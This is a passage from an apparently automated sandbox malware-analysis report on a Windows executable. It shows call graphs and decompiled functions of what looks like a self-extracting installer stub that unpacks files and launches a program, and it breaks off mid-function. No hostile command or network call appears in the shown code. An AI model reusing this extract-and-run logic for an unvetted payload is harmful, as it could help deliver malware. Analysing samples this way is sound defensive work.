16190->16191 16192 403a76 30 API calls 16191->16192 16193 4040d4 16192->16193 16194 4040fe 16193->16194 16195 401ce1 30 API calls 16193->16195 16196 4039df 30 API calls 16194->16196 16197 4040ee 16195->16197 16198 40410f 16196->16198 16199 401ce1 30 API calls 16197->16199 16198->14043 16199->16194 16201 403a9c ctype 29 API calls 16200->16201 16202 40214a 16201->16202 16203 403a9c ctype 29 API calls 16202->16203 16204 402151 16203->16204 16204->14043 16206 405f68 __EH_prolog 16205->16206 16207 405ff8 16206->16207 16208 405f7f 16206->16208 16221 405ebc 16207->16221 16210 402170 30 API calls 16208->16210 16213 405f93 16210->16213 16212 401a03 31 API calls 16214 405ff3 16212->16214 16215 405fb2 LoadStringW 16213->16215 16216 402170 30 API calls 16213->16216 16218 403a9c ctype 29 API calls 16214->16218 16215->16213 16217 405fcb 16215->16217 16216->16215 16220 401ce1 30 API calls 16217->16220 16219 4015a2 16218->16219 16219->13510 16220->16214 16222 405ec6 __EH_prolog 16221->16222 16223 40243e 30 API calls 16222->16223 16224 405ee9 16223->16224 16225 405f08 LoadStringA 16224->16225 16227 40243e 30 API calls 16224->16227 16225->16224 16226 405f21 16225->16226 16228 403d24 30 API calls 16226->16228 16227->16225 16229 405f42 16228->16229 16230 403a9c ctype 29 API calls 16229->16230 16231 405f4a 16230->16231 16231->16212 16268 404c54 __EH_prolog 16267->16268 16269 404d51 30 API calls 16268->16269 16270 404c64 16269->16270 16303 405468 16270->16303 16273 405468 30 API calls 16274 404c86 16273->16274 16275 403d24 30 API calls 16274->16275 16276 404c97 16275->16276 16277 403a9c ctype 29 API calls 16276->16277 16283 404ca3 16277->16283 16279 404cfe 16280 403a9c ctype 29 API calls 16279->16280 16282 404d0a 16280->16282 16281 403d24 30 API calls 16281->16283 16284 40551a FindClose 16282->16284 16283->16279 16283->16281 16288 404cd3 16283->16288 16313 405949 16283->16313 16317 404d6c 16283->16317 16286 404d13 16284->16286 16332 40489c SetFileAttributesA 16286->16332 16290 403a9c ctype 29 API calls 16288->16290 16289 404d1c 16291 404d27 16289->16291 16333 4048aa RemoveDirectoryA 16289->16333 16292 404cdf 16290->16292 16294 403a9c ctype 29 API calls 16291->16294 16293 40551a FindClose 16292->16293 16296 404ce8 16293->16296 16297 404d31 16294->16297 16298 403a9c ctype 29 API calls 16296->16298 16299 403a9c ctype 29 API calls 16297->16299 16300 404cf0 16298->16300 16301 401a41 16299->16301 16302 403a9c ctype 29 API calls 16300->16302 16301->13532 16302->16301 16304 405472 __EH_prolog 16303->16304 16305 403d24 30 API calls 16304->16305 16306 405485 16305->16306 16307 401ee5 30 API calls 16306->16307 16308 405494 16307->16308 16309 403d24 30 API calls 16308->16309 16310 40549f 16309->16310 16311 403a9c ctype 29 API calls 16310->16311 16312 404c75 16311->16312 16312->16273 16316 405951 16313->16316 16315 40596a 16315->16283 16316->16315 16334 405929 16316->16334 16318 404d76 __EH_prolog 16317->16318 16319 404d88 16318->16319 16320 404da9 16318->16320 16344 405417 16319->16344 16322 405417 30 API calls 16320->16322 16324 404db8 16322->16324 16326 404bdc 2 API calls 16324->16326 16327 404da2 16326->16327 16328 403a9c ctype 29 API calls 16327->16328 16329 404dc9 16328->16329 16330 403a9c ctype 29 API calls 16329->16330 16331 404dd1 16330->16331 16331->16283 16332->16289 16333->16291 16335 405939 16334->16335 16336 40592e 16334->16336 16338 40553a 32 API calls 16335->16338 16340 4057cf FindNextFileA 16336->16340 16339 405937 16338->16339 16339->16316 16341 4057f1 16340->16341 16342 4057ff 16340->16342 16343 40557f 30 API calls 16341->16343 16342->16339 16343->16342 16345 405421 __EH_prolog 16344->16345 16346 403d24 30 API calls 16345->16346 16347 405434 16346->16347 16354 4054b9 16347->16354 16350 403d24 30 API calls 16355 40248c 30 API calls 16354->16355 16356 405443 16355->16356 16356->16350 16366 416d5d 16357->16366 16360 416cc9 GetCurrentProcess TerminateProcess 16363 416cda 16360->16363 16361 416d44 16369 416d66 16361->16369 16362 416d4b ExitProcess 16363->16361 16363->16362 16367 41570a ctype 29 API calls 16366->16367 16368 416cbe 16367->16368 16368->16360 16368->16363 16372 41576b LeaveCriticalSection 16369->16372 16371 414bed 16371->13688 16372->16371 16373 416cb8 16374 416d5d 29 API calls 16373->16374 16375 416cbe 16374->16375 16376 416cc9 GetCurrentProcess TerminateProcess 16375->16376 16379 416cda 16375->16379 16376->16379 16377 416d44 16380 416d66 LeaveCriticalSection 16377->16380 16378 416d4b ExitProcess 16379->16377 16379->16378 16381 416d49 16380->16381 16382 41584a SetUnhandledExceptionFilter 16383 40b8bb 16384 40b8c8 16383->16384 16385 40b8d9 16383->16385 16384->16385 16389 40b8fa 16384->16389 16388 403a9c ctype 29 API calls 16388->16385 16390 40b904 __EH_prolog 16389->16390 16391 4042d6 ctype 34 API calls 16390->16391 16392 40b928 16391->16392 16393 4042ad ctype 34 API calls 16392->16393 16394 40b933 16393->16394 16395 4042d6 ctype 34 API calls 16394->16395 16396 40b94a 16395->16396 16397 4042ad ctype 34 API calls 16396->16397 16398 40b955 16397->16398 16399 4099bc 34 API calls 16398->16399 16400 40b8d3 16399->16400 16400->16388

                                          Executed Functions

                                          Function 00414B04 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 83%
                                          			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				signed int _t27;
				intOrPtr _t29;
				signed int _t35;
				intOrPtr _t52;

				_t47 = __edi;
				_push(0xffffffff);
				_push(0x41b9e0);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(__edi);
				_v28 = _t52 - 0x58;
				_t15 = GetVersion();
				 *0x4233d0 = 0;
				_t35 = _t15 & 0x000000ff;
				 *0x4233cc = _t35;
				 *0x4233c8 = _t35 << 8;
				 *0x4233c4 = _t15 >> 0x10;
				if(E004159F8(_t35 << 8, 1) == 0) {
					E00414C31(0x1c);
				}
				if(E004154BC() == 0) {
					E00414C31(0x10);
				}
				_v8 = 0;
				E00417641();
				 *0x425a3c = GetCommandLineA();
				 *0x423340 = E0041750F();
				E004172C2();
				E00417209();
				E00416C69();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E004171B1();
				_t56 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t27 = 0xa;
				} else {
					_t27 = _v96.wShowWindow & 0x0000ffff;
				}
				_t29 = E00401014(_t56, GetModuleHandleA(0), 0, _v104, _t27); // executed
				_v100 = _t29;
				E00416C96(_t29);
				_v108 =  *((intOrPtr*)( *_v24));
				return E00417039(_t47, _t56,  *((intOrPtr*)( *_v24)), _v24);
			}















                                          0x00414b04
                                          0x00414b07
                                          0x00414b09
                                          0x00414b0e
                                          0x00414b19
                                          0x00414b1a
                                          0x00414b26
                                          0x00414b27
                                          0x00414b2a
                                          0x00414b34
                                          0x00414b3c
                                          0x00414b42
                                          0x00414b4d
                                          0x00414b56
                                          0x00414b65
                                          0x00414b69
                                          0x00414b6e
                                          0x00414b76
                                          0x00414b7a
                                          0x00414b7f
                                          0x00414b82
                                          0x00414b85
                                          0x00414b90
                                          0x00414b9a
                                          0x00414b9f
                                          0x00414ba4
                                          0x00414ba9
                                          0x00414bae
                                          0x00414bb5
                                          0x00414bc0
                                          0x00414bc3
                                          0x00414bc7
                                          0x00414bd1
                                          0x00414bc9
                                          0x00414bc9
                                          0x00414bc9
                                          0x00414bdf
                                          0x00414be4
                                          0x00414be8
                                          0x00414bf4
                                          0x00414c00

                                          APIs
                                          • GetVersion.KERNEL32 ref: 00414B2A
                                            • Part of subcall function 004159F8: HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                            • Part of subcall function 004159F8: HeapDestroy.KERNEL32 ref: 00415A48
                                          • GetCommandLineA.KERNEL32 ref: 00414B8A
                                          • GetStartupInfoA.KERNEL32(?), ref: 00414BB5
                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00414BD8
                                            • Part of subcall function 00414C31: ExitProcess.KERNEL32 ref: 00414C4E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                          • String ID:
                                          • API String ID: 2057626494-0
                                          • Opcode ID: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                                          • Instruction ID: b13fe99396feb2249fb7197ea22bdd2eb3a8d4431b5d50e9622b99800ed9eeb5
                                          • Opcode Fuzzy Hash: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                                          • Instruction Fuzzy Hash: 0721D2B0A44705AFD718AFB6DC46BEE7BB8EF44714F10052FF9009A291DB3C85808A9C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004055DE Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 77%
                                          			E004055DE(void** __ecx, void* __eflags) {
				signed int _t23;
				signed int _t25;
				void* _t36;
				void** _t51;
				void* _t53;

				E00413954(E004196AC, _t53);
				_t51 = __ecx;
				_t23 = E0040551A(__ecx);
				if(_t23 != 0) {
					if( *0x423148 == 0) {
						E00401C80(_t53 - 0x18,  *(_t53 + 8));
						 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
						_t25 = AreFileApisANSI();
						asm("sbb eax, eax");
						_push( ~_t25 + 1);
						 *_t51 = FindFirstFileA( *(E00403D04(_t53 - 0x24)), _t53 - 0x164);
						E00403A9C( *((intOrPtr*)(_t53 - 0x24)));
						 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
						E00403A9C( *((intOrPtr*)(_t53 - 0x18)));
						__eflags =  *_t51 - 0xffffffff;
						if(__eflags != 0) {
							E00405705(_t53 - 0x164,  *((intOrPtr*)(_t53 + 0xc)), __eflags);
						}
					} else {
						_t36 = FindFirstFileW( *(_t53 + 8), _t53 - 0x3b4); // executed
						_t61 = _t36 - 0xffffffff;
						 *_t51 = _t36;
						if(_t36 != 0xffffffff) {
							E004056A6(_t53 - 0x3b4,  *((intOrPtr*)(_t53 + 0xc)), _t61);
						}
					}
					_t23 = 0 |  *_t51 != 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t23;
			}








                                          0x004055e3
                                          0x004055ef
                                          0x004055f1
                                          0x004055f8
                                          0x00405605
                                          0x00405634
                                          0x00405639
                                          0x0040563d
                                          0x00405645
                                          0x0040564e
                                          0x00405667
                                          0x00405669
                                          0x00405671
                                          0x00405675
                                          0x0040567a
                                          0x0040567f
                                          0x0040568a
                                          0x0040568a
                                          0x00405607
                                          0x00405611
                                          0x00405617
                                          0x0040561a
                                          0x0040561c
                                          0x00405627
                                          0x00405627
                                          0x0040561c
                                          0x00405694
                                          0x00405694
                                          0x0040569b
                                          0x004056a3

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004055E3
                                            • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                                          • AreFileApisANSI.KERNEL32(?), ref: 0040563D
                                          • FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040565E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileFind$First$ApisCloseH_prolog
                                          • String ID:
                                          • API String ID: 4121580741-0
                                          • Opcode ID: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                                          • Instruction ID: 53571c6d670a3437f98eaf3b47711b77fa147e423a783867877babb07b55427d
                                          • Opcode Fuzzy Hash: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                                          • Instruction Fuzzy Hash: AB21813180050ADFCF11EF60C8459EEBB75EF00329F10476AE4A5B61E1DB399A85CF48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040553A Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040553A(void** __ecx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				struct _WIN32_FIND_DATAA _v324;
				void* _t8;
				void** _t14;

				_t14 = __ecx;
				if(E0040551A(__ecx) == 0) {
					L2:
					return 0;
				}
				_t8 = FindFirstFileA(_a4,  &_v324); // executed
				 *_t14 = _t8;
				if(_t8 != 0xffffffff) {
					E0040557F( &_v324, _a8, __eflags);
					return 1;
				}
				goto L2;
			}






                                          0x00405544
                                          0x0040554d
                                          0x00405566
                                          0x00000000
                                          0x00405566
                                          0x00405559
                                          0x00405562
                                          0x00405564
                                          0x00405573
                                          0x00000000
                                          0x00405578
                                          0x00000000

                                          APIs
                                            • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                          • FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                                          • Instruction ID: 4d0f5172a85985fc9641596f45f8b0e99eb03685ed3a07152804d04183bf4296
                                          • Opcode Fuzzy Hash: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                                          • Instruction Fuzzy Hash: 5DE0923040050876CB20BF35DC019EB776AEF11398F104276F955672E5D738D9468F98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041584A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041584A() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00415804); // executed
				 *0x4233b0 = _t1;
				return _t1;
			}




                                          0x0041584f
                                          0x00415855
                                          0x0041585a

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00015804), ref: 0041584F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                                          • Instruction ID: 76677b13eed7a87b3dd700732a0fedcf1c6828d453a24416ba8446ce1f8cc847
                                          • Opcode Fuzzy Hash: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                                          • Instruction Fuzzy Hash: 6CA022F0280300CF8B00AF20AC082C03E30F28830330000B3B80080238CF380388CA2C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041585C Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNELBASE ref: 00415861
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                                          • Instruction ID: 9f5714f3741d262582d91aa49c58cb07bd20065c27159592644951a243d3f8b5
                                          • Opcode Fuzzy Hash: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401014 Relevance: 56.7, APIs: 12, Strings: 20, Instructions: 692windowsynchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 401014-401124 call 401a51 call 402170 * 4 GetCommandLineW call 401c80 call 4038ee call 403a9c call 402170 call 4045e2 call 40235e call 402323 call 401c80 call 401e3a call 403b4f call 403a9c * 2 35 401126-401155 call 401e19 call 401d7a call 403a9c call 40235e call 402323 0->35 36 40115a-401184 call 40243e call 401af4 0->36 35->36 45 401186-401189 36->45 46 40119f-4011cb call 401c80 call 402170 36->46 48 401197-40119a 45->48 49 40118b-401192 call 411093 45->49 62 4014b1-4014d5 call 401ecd call 405298 46->62 63 4011d1-4011f7 call 402155 call 403d5a 46->63 53 4019c4-4019f7 call 403a9c * 6 48->53 49->48 109 4019fa 53->109 78 4014f0-4014fc call 403a76 62->78 79 4014d7-4014da 62->79 80 401212-4012a1 call 401c80 call 404073 call 403a9c call 401c80 call 404073 call 403a9c call 401c80 call 404073 call 403a9c call 403b4f 63->80 81 4011f9-4011fc 63->81 99 401513 78->99 100 4014fe-401511 call 401f0d 78->100 85 4014e8-4014eb 79->85 86 4014dc-4014e3 call 411093 79->86 189 4012a3 80->189 190 4012a9-4012d1 call 401c80 call 404041 call 403a9c 80->190 82 40120a-40120d 81->82 83 4011fe-401205 call 411093 81->83 91 401333-401398 call 4042d6 call 4042ad call 403a9c * 8 82->91 83->82 94 401998-4019c1 call 401a2d call 403a9c * 3 85->94 86->85 91->109 94->53 106 401515-401517 99->106 100->106 112 401519-40151b 106->112 113 40151f-401528 call 408107 106->113 118 4019fc-401a00 109->118 112->113 125 40152a-401536 call 411093 113->125 126 40153b-401583 call 401a03 call 402170 call 402f15 113->126 140 40163e-401640 125->140 156 401585-401588 126->156 157 4015f9-401622 call 403a9c call 401ecd call 405033 SetCurrentDirectoryA 126->157 140->85 145 401646-40164c 140->145 145->85 161 4015f1-4015f4 156->161 162 40158a-40158d 156->162 196 401651-401654 157->196 197 401624-40163d SetCurrentDirectoryA call 403a9c * 2 157->197 166 4018b7-4018cb call 403a9c * 2 161->166 167 401594-4015b7 call 40602f call 401d7a call 403a9c 162->167 168 40158f-401592 162->168 200 4018d3-401935 call 401a2d call 403a9c * 9 166->200 201 4018cd-4018cf 166->201 169 4015bc-4015c1 167->169 168->167 168->169 169->161 178 4015c3-4015c6 169->178 178->161 184 4015c8-4015f0 call 40602f MessageBoxW call 403a9c 178->184 184->161 189->190 235 4012d3-4012e6 call 401d7a 190->235 236 4012eb-4012ee 190->236 202 40165a-401691 call 401a18 196->202 203 40172c-40172f 196->203 197->140 200->118 201->200 222 401693-40169a call 401de3 202->222 223 40169f-4016e4 call 401a18 ShellExecuteExA 202->223 211 401731-40176b call 401d1b call 401a18 call 40587c call 403a9c 203->211 212 401787-4017f9 call 401ce1 call 405d0b call 401c80 call 401e56 call 403a9c * 2 call 401c80 call 401e56 call 403a9c 203->212 211->212 278 40176d-401770 211->278 324 401811-401891 call 402634 call 401a18 call 403a9c CreateProcessA 212->324 325 4017fb-40180c call 401db8 call 401de3 212->325 222->223 245 4016e6-4016e9 223->245 246 40170d-401727 call 403a9c * 2 223->246 235->236 242 4012f4-4012f7 236->242 243 40139d-4014ac call 401c80 call 404073 call 401d7a call 403a9c * 2 call 401c80 call 404073 call 401d7a call 403a9c * 2 call 401c80 call 404073 call 402634 call 401d7a call 403a9c * 6 call 4042d6 call 4042ad 236->243 242->243 251 4012fd-40130f MessageBoxW 242->251 243->62 253 4016f7-401708 call 403a9c * 2 245->253 254 4016eb-4016f2 call 411093 245->254 281 40195a-40195e 246->281 251->243 259 401315-401330 call 403a9c * 3 251->259 287 4018ae 253->287 254->253 259->91 279 401776-401782 call 411093 278->279 280 4018af-4018b4 SetCurrentDirectoryA 278->280 279->280 280->166 289 401960-40196e WaitForSingleObject CloseHandle 281->289 290 401974-40197c SetCurrentDirectoryA call 403a9c 281->290 287->280 289->290 303 401981-401990 call 403a9c 290->303 303->94 317 401992-401994 303->317 317->94 342 401897-40189a 324->342 343 40193a-401955 CloseHandle call 403a9c 324->343 325->324 345 4018a3-4018a9 call 403a9c 342->345 346 40189c-40189e call 411127 342->346 343->281 345->287 346->345
                                          C-Code - Quality: 90%
                                          			E00401014(void* __eflags, void* _a4, signed int _a7) {
				signed int _v5;
				char _v20;
				struct HWND__* _v24;
				struct HWND__* _v28;
				char _v32;
				struct HWND__* _v36;
				signed int _v40;
				signed int _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				char _v56;
				WCHAR* _v68;
				struct HWND__* _v72;
				struct HWND__* _v76;
				char _v80;
				struct HWND__* _v84;
				struct HWND__* _v88;
				char _v92;
				struct HWND__* _v96;
				struct HWND__* _v100;
				char _v104;
				struct HWND__* _v108;
				struct HWND__* _v112;
				char _v116;
				CHAR* _v128;
				CHAR* _v140;
				char _v144;
				struct HWND__* _v148;
				struct HWND__* _v152;
				char _v156;
				intOrPtr _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v212;
				char _v216;
				CHAR* _v228;
				struct _PROCESS_INFORMATION _v244;
				struct _STARTUPINFOA _v312;
				void* __ebp;
				char _t280;
				intOrPtr* _t294;
				void* _t297;
				void* _t302;
				signed int _t306;
				signed int _t308;
				signed int _t314;
				signed int _t318;
				signed int _t339;
				void* _t375;
				signed char _t384;
				signed int _t423;
				signed int _t436;
				int _t466;
				intOrPtr _t501;
				void* _t619;
				void* _t620;
				void* _t635;
				signed int _t636;
				signed int _t640;
				signed int _t642;
				void* _t643;
				char** _t644;

				 *0x423144 = _a4;
				_t280 = E00401A51();
				_t635 = 3;
				 *0x423148 = _t280;
				_v156 = 0;
				_v152 = 0;
				_v148 = 0;
				E00402170( &_v156, _t635);
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				E00402170( &_v32, _t635);
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				E00402170( &_v80, _t635);
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				E00402170( &_v116, _t635);
				E00401C80( &_v68, GetCommandLineW());
				_push( &_v32);
				E004038EE( &_v68,  &_v156);
				E00403A9C(_v68);
				_v104 = 0;
				_v100 = 0;
				_v96 = 0;
				E00402170( &_v104, _t635);
				_t501 =  *0x423144; // 0x400000
				E004045E2(_t501,  &_v104);
				E0040235E( &_v32);
				E00402323( &_v32);
				_a7 = 0;
				_t294 = E00401C80( &_v68, L"-y");
				E00401E3A( &_v32,  &_v20, 2);
				_t297 = E00403B4F( *_t294);
				E00403A9C(_v20);
				E00403A9C(_v68);
				_t649 = _t297;
				if(_t297 == 0) {
					_a7 = 1;
					E00401D7A( &_v32, E00401E19( &_v32,  &_v20, 2));
					E00403A9C(_v20);
					E0040235E( &_v32);
					E00402323( &_v32);
				}
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				E0040243E( &_v92, _t635);
				_push( &_v92);
				_push(";!@InstallEnd@!");
				_t302 = E00401AF4(_v104, ";!@Install@!UTF-8!", _t649); // executed
				if(_t302 != 0) {
					E00401C80( &_v212, L".\\");
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					E00402170( &_v56, _t635);
					__eflags = _v88;
					_v216 = 1;
					if(_v88 == 0) {
						L21:
						_v144 = 0;
						E00401ECD( &_v140);
						_t306 = E00405298( &_v144, _t643,  *0x420060);
						__eflags = _t306;
						if(_t306 != 0) {
							_push(0x1c);
							_t640 = E00403A76();
							__eflags = _t640;
							if(_t640 == 0) {
								_t636 = 0;
								__eflags = 0;
							} else {
								_t139 = _t640 + 8; // 0x8
								 *((intOrPtr*)(_t640 + 4)) = 0;
								E00401F0D(_t139);
								 *_t640 = 0x41b328;
								_t636 = _t640;
							}
							__eflags = _t636;
							if(_t636 != 0) {
								 *((intOrPtr*)( *_t636 + 4))(_t636);
							}
							_t308 = E00408107(_t636);
							__eflags = _t308;
							if(_t308 == 0) {
								E00401A03();
								_v5 = 0;
								_v44 = 0;
								_v40 = 0;
								_v36 = 0;
								E00402170( &_v44, 3);
								_push( &_v44);
								_push( &_v5);
								_push(_v216);
								_push( &_v200); // executed
								_t314 = E00402F15(_t636,  &_v104, __eflags); // executed
								__eflags = _t314;
								if(_t314 == 0) {
									E00403A9C(_v44);
									E00401ECD( &_v128);
									E00405033( &_v128);
									_t318 = SetCurrentDirectoryA(_v140); // executed
									__eflags = _t318;
									if(_t318 != 0) {
										__eflags = _v76;
										if(_v76 == 0) {
											__eflags = _v52;
											if(_v52 != 0) {
												L57:
												E00401CE1( &_v68,  &_v200);
												E00405D0B( &_v68);
												E00401C80( &_v20, L"%%T\\");
												E00401E56( &_v56,  &_v20,  &_v68);
												E00403A9C(_v20);
												E00403A9C(_v68);
												E00401C80( &_v20, L"%%T");
												E00401E56( &_v56,  &_v20,  &_v200);
												E00403A9C(_v20);
												__eflags = _v28;
												if(_v28 != 0) {
													E00401DB8( &_v56, 0x20);
													E00401DE3( &_v56,  &_v32);
												}
												_push( &_v56);
												_v312.cb = 0x44;
												_v312.lpReserved = 0;
												_v312.lpDesktop.cbSize = 0;
												_v312.lpTitle = 0;
												_v312.dwFlags = 0;
												_v312.cbReserved2 = 0;
												_v312.lpReserved2 = 0;
												E00402634( &_v188,  &_v212);
												E00401A18();
												E00403A9C(_v188);
												_t339 = CreateProcessA(0, _v228, 0, 0, 0, 0, 0, 0,  &_v312,  &_v244); // executed
												__eflags = _t339;
												if(_t339 != 0) {
													CloseHandle(_v244.hThread);
													_a4 = _v244.hProcess;
													E00403A9C(_v228);
													L69:
													__eflags = _a4;
													if(_a4 != 0) {
														WaitForSingleObject(_a4, 0xffffffff);
														CloseHandle(_a4);
													}
													SetCurrentDirectoryA(_v128); // executed
